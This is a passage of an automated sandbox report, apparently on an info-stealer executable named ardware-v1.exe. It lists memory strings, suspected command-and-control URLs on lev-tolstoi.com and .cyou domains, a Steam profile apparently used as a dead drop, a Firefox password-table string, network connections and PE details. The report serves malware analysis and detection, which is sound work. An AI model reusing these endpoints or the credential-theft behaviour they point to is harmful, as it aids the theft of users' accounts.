00000000.00000003.3199544092.0000000003590000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3221154051.0000000003598000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3153106623.000000000358F000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220131253.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3119118468.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api00
                Source: ardware-v1.exe, 00000000.00000002.3221085949.0000000003500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiERPR
                Source: ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apim
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis7
                Source: ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121711204.0000000000B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                Source: ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/op
                Source: ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pis$
                Source: ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/te
                Source: ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/uo
                Source: ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/xt
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: ardware-v1.exeString found in binary or memory: https://sectigo.com/CPS0
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api
                Source: ardware-v1.exe, 00000000.00000002.3220131253.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/s
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/DI;
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: ardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: ardware-v1.exeString found in binary or memory: https://www.ssl.com/repository0
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49858 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.5:49869 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49879 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49886 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49899 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49905 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49915 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49922 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49932 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49943 version: TLS 1.2
                Source: C:\Users\user\Desktop\ardware-v1.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0082B0_3_00B0082B
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0082B0_3_00B0082B
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0082B0_3_00B0082B
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0082B0_3_00B0082B
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0082B0_3_00B0082B
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0082B0_3_00B0082B
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0082B0_3_00B0082B
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0082B0_3_00B0082B
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0082B0_3_00B0082B
                Source: ardware-v1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@1/0@13/4
                Source: ardware-v1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\ardware-v1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ardware-v1.exe, 00000000.00000003.3029106103.0000000003512000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028963391.000000000352E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ardware-v1.exeVirustotal: Detection: 15%
                Source: ardware-v1.exeReversingLabs: Detection: 23%
                Source: C:\Users\user\Desktop\ardware-v1.exeFile read: C:\Users\user\Desktop\ardware-v1.exeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: ardware-v1.exeStatic PE information: certificate valid
                Source: ardware-v1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: ardware-v1.exeStatic file information: File size 3487960 > 1048576
                Source: ardware-v1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x312800
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: ardware-v1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Admin\Workspace\1191982842\Project\Release\Project.pdb source: ardware-v1.exe
                Source: ardware-v1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: ardware-v1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: ardware-v1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: ardware-v1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: ardware-v1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DE71 push eax; ret 0_3_00B0DE79
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DE71 push eax; ret 0_3_00B0DE79
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DE71 push eax; ret 0_3_00B0DE79
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B09712 push ecx; retf 0_3_00B09738
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B09712 push ecx; retf 0_3_00B09738
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B09712 push ecx; retf 0_3_00B09738
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DCDA push eax; ret 0_3_00B0DCE1
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DCDA push eax; ret 0_3_00B0DCE1
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DCDA push eax; ret 0_3_00B0DCE1
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B09CC1 pushad ; retf 0_3_00B09CC9
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B09CC1 pushad ; retf 0_3_00B09CC9
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B09CC1 pushad ; retf 0_3_00B09CC9
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DD4A push eax; ret 0_3_00B0DD59
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DD4A push eax; ret 0_3_00B0DD59
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B0DD4A push eax; ret 0_3_00B0DD59
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00A8C868 push edx; iretd 0_3_00A8CC4B
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00A8C868 push edx; iretd 0_3_00A8CC4B
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00A8B860 push edx; iretd 0_3_00A8B863
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00A8B860 push edx; iretd 0_3_00A8B863
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B01106 push eax; ret 0_3_00B0110D
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B01106 push eax; ret 0_3_00B0110D
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B01106 push eax; ret 0_3_00B0110D
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B01106 push eax; ret 0_3_00B0110D
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_00B01106 push eax; ret 0_3_00B0110D
